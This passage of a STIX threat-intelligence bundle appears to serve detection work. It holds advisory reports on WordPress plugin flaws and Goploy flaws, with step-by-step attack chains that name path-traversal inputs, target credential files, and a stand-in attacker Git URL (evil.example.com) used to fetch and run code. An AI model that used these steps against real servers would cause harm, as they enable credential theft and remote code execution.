      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data from Local System",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1005",
          "url": "https://attack.mitre.org/techniques/T1005"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--30087da7-3632-54ea-85ee-4672494063e5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--4ea6f0cc-35f2-5a9f-b88b-d355311cdff6",
      "target_ref": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--4ea6f0cc-35f2-5a9f-b88b-d355311cdff6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-14244: Jssor Slider for WordPress Directory Traversal",
      "description": "## Overview\n\nThe Jssor Slider plugin for WordPress, developed by jssor.com, contains a critical directory traversal vulnerability, tracked as CVE-2026-14244. This flaw affects all versions of the plugin up to and including 3.1.24. An unauthenticated attacker can exploit this vulnerability by manipulating the 'url' parameter within HTTP requests, enabling them to read arbitrary files from the compromised server's file system. This direct access to server files can lead to the exposure of sensitive data, configuration files, source code, or credentials, which could facilitate further exploitation or privilege escalation. Given the widespread use of WordPress, this vulnerability poses a significant risk to affected organizations if not patched promptly.\n\n## Attack Chain\n\n1.  An unauthenticated attacker sends a specially crafted HTTP GET or POST request to a vulnerable WordPress instance running the Jssor Slider plugin.\n2.  The request targets a plugin endpoint, including the `url` parameter.\n3.  The attacker injects directory traversal sequences (e.g., `../`, `..\\`, `%2e%2e%2f`) into the value of the `url` parameter, attempting to navigate outside the intended directory.\n4.  The vulnerable Jssor Slider plugin, when processing the malformed `url` parameter, fails to properly sanitize the input.\n5.  The plugin's backend then attempts to access or read a file path constructed using the attacker-controlled input.\n6.  This action bypasses access restrictions, allowing the plugin to read the contents of arbitrary files on the server (e.g., `/etc/passwd`, `wp-config.php`).\n7.  The server responds with the content of the requested arbitrary file, delivering sensitive information directly to the attacker.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-14244 allows unauthenticated attackers to gain unauthorized access to sensitive information stored on the compromised web server. This includes, but is not limited to, database credentials in `wp-config.php`, user password hashes, private keys, configuration files, or other proprietary data. The ability to read arbitrary files can lead to data breaches, further system compromise through exposed credentials, or complete site takeover. The CVSS v3.1 base score of 7.5 highlights the high severity and potential for significant damage, affecting any organization utilizing the vulnerable Jssor Slider plugin on their WordPress installations.\n\n## Recommendation\n\n*   Immediately update the Jssor Slider plugin for WordPress to a patched version beyond 3.1.24 to remediate CVE-2026-14244.\n*   Deploy the Sigma rule below to your SIEM to detect attempts at CVE-2026-14244 exploitation.\n*   Review web server access logs for patterns identified by the Sigma rule, specifically looking for `../` or similar sequences in `url` parameters, to identify potential past exploitation.\n",
      "published": "2026-07-08T05:21:39Z",
      "labels": [
        "wordpress",
        "plugin",
        "directory-traversal",
        "webserver",
        "cve"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-14244"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--1fd05ca6-b0c7-5ec6-a13d-9e13f050c053",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--4e2c978c-c53d-5d03-a2eb-c92f7cff2607",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--4e2c978c-c53d-5d03-a2eb-c92f7cff2607",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-14158: WordPress Widget Logic Visual Plugin Remote Code Execution",
      "description": "## Overview\n\nThe WordPress Widget Logic Visual plugin, affecting all versions up to and including 1.52, contains a critical Remote Code Execution vulnerability, identified as CVE-2026-14158. This flaw arises from a combination of missing capability checks and nonce verification on the `widget-logic-update-conditional-tags` AJAX action. Additionally, there is insufficient sanitization of the `nwlv[cod-tag]` parameter before it is stored and subsequently used within an `eval()` call. This design oversight enables authenticated attackers, specifically those with subscriber-level access or higher, to inject and execute arbitrary PHP code on the underlying server. The vulnerability allows for complete compromise of the WordPress instance and potentially the host system.\n\n## Attack Chain\n\n1.  An attacker gains authenticated access to a vulnerable WordPress instance with at least subscriber-level privileges.\n2.  The attacker crafts a malicious AJAX request targeting the `/wp-admin/admin-ajax.php` endpoint.\n3.  The crafted request includes the `action=widget-logic-update-conditional-tags` parameter and a malicious payload within the `nwlv[cod-tag]` parameter.\n4.  Due to the lack of capability checks and nonce verification, the WordPress application processes the attacker's request without proper authorization.\n5.  Insufficient sanitization of the `nwlv[cod-tag]` parameter allows the malicious code to be stored without modification.\n6.  At a later point, or upon a specific event related to widget logic processing, the stored malicious `nwlv[cod-tag]` content is passed directly to a PHP `eval()` function.\n7.  The `eval()` function executes the attacker's arbitrary PHP code on the server, leading to Remote Code Execution.\n8.  The attacker can then perform various actions, such as installing backdoors, defacing the website, exfiltrating data, or further compromising the server.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-14158 leads to Remote Code Execution (RCE) on the compromised WordPress server. This means an authenticated attacker, even with minimal privileges (subscriber role), can execute arbitrary commands, leading to complete control over the website and potentially the underlying server. Consequences can include website defacement, data theft (including sensitive user information from the WordPress database), installation of malware or cryptocurrency miners, establishment of persistent backdoors, and use of the compromised server as a launchpad for further attacks within the network. This vulnerability has a CVSS v3.1 Base Score of 8.8, indicating high severity.\n\n## Recommendation\n\n*   Immediately update the \"Widget Logic Visual\" plugin to a patched version once available, or disable/remove the plugin if an update is not yet released, to remediate CVE-2026-14158.\n*   Deploy the Sigma rule `Detects CVE-2026-14158 Exploitation — WordPress Widget Logic Visual RCE Attempt` to your SIEM to detect attempts to exploit this vulnerability.\n*   Enable comprehensive web server logging, ensuring that `cs-uri-stem`, `cs-uri-query`, and HTTP POST body content are captured, to facilitate detection of exploitation attempts against this and similar vulnerabilities.\n",
      "published": "2026-07-08T05:20:52Z",
      "labels": [
        "wordpress",
        "plugin",
        "rce",
        "webserver",
        "cve"
      ],
      "object_refs": [
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-14158"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Obtain Credential Materials",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1552",
          "url": "https://attack.mitre.org/techniques/T1552"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d63b005f-4fac-5e81-a666-056d23d0f2e3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--9e2049d8-f2b7-551d-9b9c-25a6fde12406",
      "target_ref": "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5ee3ab13-ad3c-534b-b2c1-7213321a2238",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Account Manipulation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1098",
          "url": "https://attack.mitre.org/techniques/T1098"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a4231b5a-81ad-580b-88da-2f9581c5b175",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--9e2049d8-f2b7-551d-9b9c-25a6fde12406",
      "target_ref": "attack-pattern--5ee3ab13-ad3c-534b-b2c1-7213321a2238"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--9e2049d8-f2b7-551d-9b9c-25a6fde12406",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-9701: Insecure Password Reset in WordPress Eventer Plugin",
      "description": "## Overview\n\nThe WordPress Eventer plugin, in all versions up to and including 4.4.2, contains a critical vulnerability, CVE-2026-9701, related to an insecure password reset mechanism. This flaw causes the plugin to store a plaintext copy of the password reset key directly within the `eventer_verification_code` user meta field in the `wp_usermeta` database table. When this vulnerability is combined with another, such as a SQL Injection (e.g., CVE-2026-9700), unauthenticated attackers can leverage the SQLi to extract these sensitive plaintext keys. Subsequently, attackers can use the plugin's custom password reset function to set a new password for any user account, including administrative accounts, leading to full site compromise. This attack vector is only viable on systems running PHP versions up to 7.4.\n\n## Attack Chain\n\n1.  Unauthenticated attacker identifies a WordPress site running Eventer plugin version \u003c= 4.4.2 and PHP version \u003c= 7.4.\n2.  Attacker discovers and exploits a separate SQL Injection vulnerability (e.g., CVE-2026-9700) on the target WordPress instance to gain database access.\n3.  Attacker initiates a password reset request for a high-privilege user account (e.g., administrator) on the vulnerable WordPress site.\n4.  The Eventer plugin, upon receiving the reset request, generates a password reset key and stores its plaintext value in the `eventer_verification_code` column within the `wp_usermeta` database table.\n5.  Using the previously established SQL Injection, the attacker queries the `wp_usermeta` table to extract the plaintext `eventer_verification_code` associated with the target user.\n6.  The attacker then uses the retrieved plaintext key with the Eventer plugin's specific password reset functionality (which accepts this key directly).\n7.  The attacker supplies a new password through the custom reset function, successfully changing the password for the targeted user account.\n8.  Attacker logs in with the new password, achieving full account takeover and administrative control over the WordPress site.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-9701, when chained with a SQL Injection vulnerability, allows unauthenticated attackers to completely compromise any user account on a vulnerable WordPress site, including administrator accounts. This leads to full administrative control, enabling arbitrary content modification, data exfiltration, website defacement, or further malware deployment. The vulnerability affects all Eventer plugin versions up to and including 4.4.2, but the password reset function critical for exploitation is only functional on PHP versions up to 7.4, potentially limiting the current attack surface.\n\n## Recommendation\n\n*   Upgrade the Eventer plugin immediately to a version greater than 4.4.2 to mitigate CVE-2026-9701.\n*   Patch any identified SQL Injection vulnerabilities, such as CVE-2026-9700, that could be chained with this flaw.\n*   Upgrade PHP on your WordPress server to a version higher than 7.4 to render the password reset function inoperable via this exploit path.\n*   Review webserver access logs for anomalous database access patterns or unusual password reset requests (especially if you have a WAF that could log such attempts).\n",
      "published": "2026-07-08T05:19:58Z",
      "labels": [
        "web",
        "vulnerability",
        "wordpress",
        "cve",
        "account-takeover",
        "php"
      ],
      "object_refs": [
        "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653",
        "attack-pattern--5ee3ab13-ad3c-534b-b2c1-7213321a2238"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-9701"
        }
      ],
      "confidence": 95
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d4e7c6cf-c490-5b47-8fad-e1ac4af1572e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--7cd80865-8d70-5767-b9be-1cb87b2f5f91",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--67193ec2-dec7-586e-a385-cc0f1baa8526",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data Destruction",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1485",
          "url": "https://attack.mitre.org/techniques/T1485"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--06a6c591-4e95-548d-aba6-e5d447356e59",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--7cd80865-8d70-5767-b9be-1cb87b2f5f91",
      "target_ref": "attack-pattern--67193ec2-dec7-586e-a385-cc0f1baa8526"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--7cd80865-8d70-5767-b9be-1cb87b2f5f91",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Unauthenticated Arbitrary File Deletion in WordPress Simple Coherent Form Plugin (CVE-2026-14487)",
      "description": "## Overview\n\nA critical vulnerability, CVE-2026-14487, has been identified in the Simple Coherent Form plugin for WordPress, affecting all versions up to and including 2.4.13. This flaw allows unauthenticated attackers to perform arbitrary file deletion on affected servers, carrying a CVSS v3.1 base score of 9.1. The vulnerability stems from insufficient file path validation within the `removeUploadDir` function. Attackers can leverage the `scf_get_id_upload` endpoint to obtain a valid `scf_upload_file_removal` nonce without authentication. Furthermore, a secondary hash check, intended to prevent unauthorized deletions, is easily forgeable offline due to a hardcoded salt embedded in the plugin's source code. This combination bypasses both authentication and integrity checks, enabling attackers to target and delete critical system files, most notably `wp-config.php`, which can lead directly to remote code execution.\n\n## Attack Chain\n\n1.  An unauthenticated attacker identifies a vulnerable WordPress site running the Simple Coherent Form plugin version \u003c= 2.4.13.\n2.  The attacker makes an HTTP request to the `scf_get_id_upload` endpoint, which returns a valid `scf_upload_file_removal` nonce without requiring authentication.\n3.  The attacker identifies a sensitive file path on the server, such as `wp-config.php`, as a target for deletion.\n4.  Using the publicly available plugin source code, the attacker extracts the hardcoded salt and uses it to compute a valid secondary hash for the target file path.\n5.  The attacker crafts an HTTP POST request to the plugin's file removal endpoint, including the obtained nonce, the forged secondary hash, and the target file path.\n6.  Due to insufficient file path validation in the `removeUploadDir` function, the plugin processes the request and deletes the specified arbitrary file (e.g., `wp-config.php`).\n7.  Deletion of critical files like `wp-config.php` can force a reinstallation of WordPress, allowing the attacker to establish remote code execution by providing malicious configuration during the setup process.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-14487 allows unauthenticated attackers to delete arbitrary files on the compromised server. This can lead to severe consequences, including data loss, site defacement, and denial of service. Critically, deleting key files such as `wp-config.php` can force a WordPress site into a reinstallation state. Attackers can then complete the installation with malicious configurations, effectively achieving remote code execution and full control over the affected website and potentially the underlying server. The unauthenticated nature of the vulnerability means a wide range of WordPress installations using the plugin are at risk without immediate patching.\n\n## Recommendation\n\n*   Patch CVE-2026-14487 immediately by updating the Simple Coherent Form plugin to a version greater than 2.4.13.\n*   Monitor web server logs for suspicious access patterns to plugin-related endpoints, especially those mentioned as `scf_get_id_upload` and the associated file removal endpoint, looking for unusual parameters or repeated access from unauthenticated sources.\n*   Implement file integrity monitoring (FIM) on critical WordPress files like `wp-config.php` to detect unauthorized modifications or deletions.\n",
      "published": "2026-07-08T05:19:12Z",
      "labels": [
        "wordpress",
        "plugin",
        "arbitrary-file-deletion",
        "rce",
        "webserver",
        "cve"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--67193ec2-dec7-586e-a385-cc0f1baa8526"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-14487"
        }
      ],
      "confidence": 95
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c9fb87cc-5f1c-5b59-b866-dd26ddab1ae9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--152c1a10-4c42-59c3-94a6-f295dfdca9ba",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--dba05e09-3e54-51b6-af3e-58644b62ad7d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "File and Directory Discovery",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1083",
          "url": "https://attack.mitre.org/techniques/T1083"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--cd667f98-4e54-581d-8c69-955bc622b450",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--152c1a10-4c42-59c3-94a6-f295dfdca9ba",
      "target_ref": "attack-pattern--dba05e09-3e54-51b6-af3e-58644b62ad7d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "T1552",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1552",
          "url": "https://attack.mitre.org/techniques/T1552"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--cc45a431-1be9-56b0-889f-beeed9beead7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--152c1a10-4c42-59c3-94a6-f295dfdca9ba",
      "target_ref": "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "T1059",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ee36d7c4-e72a-5e0c-89a5-f8d484c1111f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--152c1a10-4c42-59c3-94a6-f295dfdca9ba",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--152c1a10-4c42-59c3-94a6-f295dfdca9ba",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Goploy: Arbitrary File Read via Path Traversal in /deploy/fileDiff allows Remote Server Compromise",
      "description": "## Overview\n\nGoploy, an open-source automation deployment system, is affected by a severe authenticated path traversal vulnerability (CWE-22) in versions up to and including 1.17.5. This flaw, rated High severity (CVSS 7.7), allows low-privileged authenticated users to read arbitrary files on both the Goploy host and all connected remote servers. The vulnerability resides in the `/deploy/fileDiff` API endpoint, intended for file comparison, where insufficient validation of the `filePath` parameter enables directory traversal using `../` sequences. Attackers can leverage the default \"File Compare\" permission granted to the `member` role, requiring only a configured project and server. This allows for sensitive data exposure, including `/etc/passwd`, `/etc/shadow`, and SSH private keys, potentially leading to remote server compromise or equivalent RCE, making it critical for detection engineers.\n\n## Attack Chain\n\n1.  **Initial Access \u0026 Authentication**: An attacker obtains valid authentication credentials (Cookie/Token) for a low-privileged account, such as a default `member` role user, which inherently possesses \"File Compare\" permissions.\n2.  **Information Gathering (Namespace ID)**: The attacker sends a GET request to `/namespace/getOption` to retrieve available Namespace IDs, needed for subsequent requests.\n3.  **Information Gathering (Project ID)**: The attacker sends a GET request to `/deploy/getList` to identify configured Project IDs within the system.\n4.  **Information Gathering (Server ID)**: The attacker sends a GET request to `/server/getOption` to enumerate available Server IDs, representing managed remote hosts.\n5.  **Malicious Request Construction**: A POST request is crafted targeting the `/deploy/fileDiff` endpoint, including the obtained `G-N-ID` header, `projectId`, `serverId`, and a `filePath` parameter containing path traversal sequences (e.g., `../../../../etc/passwd`).\n6.  **Local File Read**: The crafted request is sent to the Goploy server, triggering the vulnerability to read arbitrary files from the local Goploy host (e.g., `/etc/passwd`, `~/.ssh/id_rsa`), with content returned in the `srcText` field.\n7.  **Remote File Read**: The same malicious payload is processed by Goploy to read arbitrary files on the target remote server via SFTP, with content returned in the `distText` field, effectively using Goploy as a proxy.\n8.  **Impact**: The attacker exfiltrates sensitive file contents, leading to credential theft, system configuration exposure, and potential SSH access to managed systems, achieving RCE-equivalent control.\n\n## Impact\n\nThrough this vulnerability, an attacker can bypass authorization to read any sensitive files on the Goploy host machine as well as all managed target servers. This includes critical files like `/etc/passwd` or `/etc/shadow` on local or remote systems, user SSH private keys (e.g., `~/.ssh/id_rsa`) which can grant passwordless SSH access and ultimately lead to Remote Code Execution (RCE). By enumerating `serverID` values, attackers can use Goploy as a jump server to conduct large-scale information theft across all bound deployment target systems, compromising various critical configuration files and database credentials.\n\n## Recommendation\n\n*   Implement strict input filtering for special characters such as `../`, `..\\`, and `%00` in the `filePath` parameter of the `/deploy/fileDiff` endpoint.\n*   Utilize built-in functions like `filepath.Clean` and enforce path whitelisting to ensure all file operations are confined to legitimate, restricted directories.\n*   Run the Goploy service, or its Docker container, with the lowest possible user privileges to mitigate the impact of successful file reads.\n*   Conduct a comprehensive security audit of all Goploy API endpoints for similar path traversal vulnerabilities, especially those that involve file read or write operations.\n*   Deploy the Sigma rules in this brief to your SIEM and tune for your environment to detect exploitation attempts against the `/deploy/fileDiff` endpoint.\n",
      "published": "2026-07-07T23:45:24Z",
      "labels": [
        "path-traversal",
        "arbitrary-file-read",
        "web-vulnerability",
        "authenticated-attack",
        "file-disclosure",
        "server-side",
        "deployment-system"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--dba05e09-3e54-51b6-af3e-58644b62ad7d",
        "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-4g5x-hcwm-82jw"
        }
      ],
      "confidence": 80
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--2c4be31c-dd2a-5526-911e-0b4fb176a6b3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "filename: .env.attacker",
      "pattern": "[x-ti-bot:filename = '.env.attacker']",
      "pattern_type": "stix",
      "valid_from": "2026-07-07T23:44:24Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--8cd0ad65-e1c8-56f9-9ad4-0b90f786a409",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dc6c17d2-0e99-5589-8146-965e4b68c126",
      "target_ref": "indicator--2c4be31c-dd2a-5526-911e-0b4fb176a6b3"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Privilege Escalation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1068",
          "url": "https://attack.mitre.org/techniques/T1068"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--44d459b6-79f0-55a0-ade2-920c2526efa4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dc6c17d2-0e99-5589-8146-965e4b68c126",
      "target_ref": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3a6f4409-4ff5-598b-8bf1-6aeb33dbf709",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dc6c17d2-0e99-5589-8146-965e4b68c126",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--dc6c17d2-0e99-5589-8146-965e4b68c126",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Goploy Cross-Namespace IDOR to RCE Vulnerability (GHSA-26rh-24rg-j3vv)",
      "description": "## Overview\n\nThe `zhenorzz/goploy` application, specifically versions up to `develop` HEAD as of 2026-05-27 and `1.17.5` Docker image, contains a critical Insecure Direct Object Reference (IDOR) vulnerability, tracked as GHSA-26rh-24rg-j3vv. This flaw resides in the `Project.AddFile`, `Project.EditFile`, `Project.RemoveFile`, and `Project.Edit` handlers within `cmd/server/api/project/handler.go`. These endpoints accept project or project-file row IDs directly from the JSON request body without verifying that the requested resource belongs to the authenticated user's namespace. An authenticated user possessing a 'manager' role in their own namespace can exploit this design flaw to access, modify, or delete files in any project across the entire goploy installation. Crucially, by manipulating a foreign project's Git remote URL via the `Project.Edit` handler, an attacker can achieve Remote Code Execution (RCE) on the underlying server. This RCE occurs when goploy next attempts a deployment, as it executes `git remote set-url` with the attacker-supplied URL, enabling arbitrary code execution under the goploy application's privileges. The vulnerability was published on 2026-07-07, and poses a significant risk to multi-tenant deployments, allowing full compromise of other tenants' projects and the application server itself.\n\n## Attack Chain\n\n1.  An attacker authenticates to the goploy application as a user with a `manager` role, which grants `FileSync` and `EditProject` permissions within their assigned namespace.\n2.  The attacker identifies a target `projectId` (e.g., `1`) belonging to another namespace (e.g., `ns_a`) by enumerating or guessing, as goploy's backend queries only filter by row ID.\n3.  The attacker sends a PUT request to the `/project/editFile` API endpoint, providing the foreign `id` (e.g., `1`) and attacker-controlled `content` in the JSON request body, leading to overwriting a legitimate file in the target project's directory.\n4.  The attacker sends a POST request to the `/project/addFile` API endpoint, supplying the foreign `projectId` (e.g., `1`) and attacker-controlled `filename` and `content` in the JSON request body, successfully planting arbitrary files within the foreign project's working directory.\n5.  The attacker sends a DELETE request to the `/project/removeFile` API endpoint, specifying the foreign `projectFileId` (e.g., `1`) in the JSON request body, leading to the deletion of legitimate files from the foreign project.\n6.  The attacker sends a PUT request to the `/project/edit` API endpoint, including the foreign `id` (e.g., `1`) and a malicious Git remote `url` (e.g., `git@evil.example.com:attacker/payload.git`) in the JSON request body, thereby rewriting the target project's Git remote URL to an attacker-controlled repository.\n7.  Upon the next deployment action for the compromised project, the goploy application executes `git remote set-url origin \u003cattacker-url\u003e` and subsequently performs a `git pull` from the attacker's repository, which executes arbitrary code on the goploy server under its privileges.\n8.  The successful execution of arbitrary code grants the attacker full Remote Code Execution (RCE) capabilities on the goploy application server, enabling further system compromise, data exfiltration, or lateral movement.\n\n## Impact\n\nThis critical vulnerability allows an authenticated attacker with a 'manager' role to gain full control over any project across all namespaces within the goploy installation. The ability to arbitrarily read, write, and delete files in foreign projects can lead to data tampering, unauthorized data access, and disruption of services. More severely, the RCE primitive allows for complete compromise of the goploy application server, enabling attackers to execute arbitrary commands, steal sensitive configuration or data, establish persistence, and potentially pivot to other systems within the network. This vulnerability is particularly impactful in multi-tenant environments where tenant separation and data integrity are paramount.\n\n## Recommendation\n\n*   Patch `zhenorzz/goploy` by applying the suggested fix (add namespace-scoped `GetData` functions) or upgrading to a version that addresses GHSA-26rh-24rg-j3vv immediately.\n*   Deploy the provided network detection rule to identify connections from your goploy application to `evil.example.com` or other suspicious external Git repository domains.\n*   Monitor webserver logs for HTTP PUT requests to `/project/edit` and HTTP POST/PUT/DELETE requests to `/project/addFile`, `/project/editFile`, `/project/removeFile` that exhibit anomalous `projectId` values or are initiated by users not typically involved in cross-project administration.\n*   Review access control mechanisms within goploy, ensuring that roles such as `manager` (or any role with `FileSync` / `EditProject` permissions) are strictly confined to their intended namespace and cannot interact with resources outside their 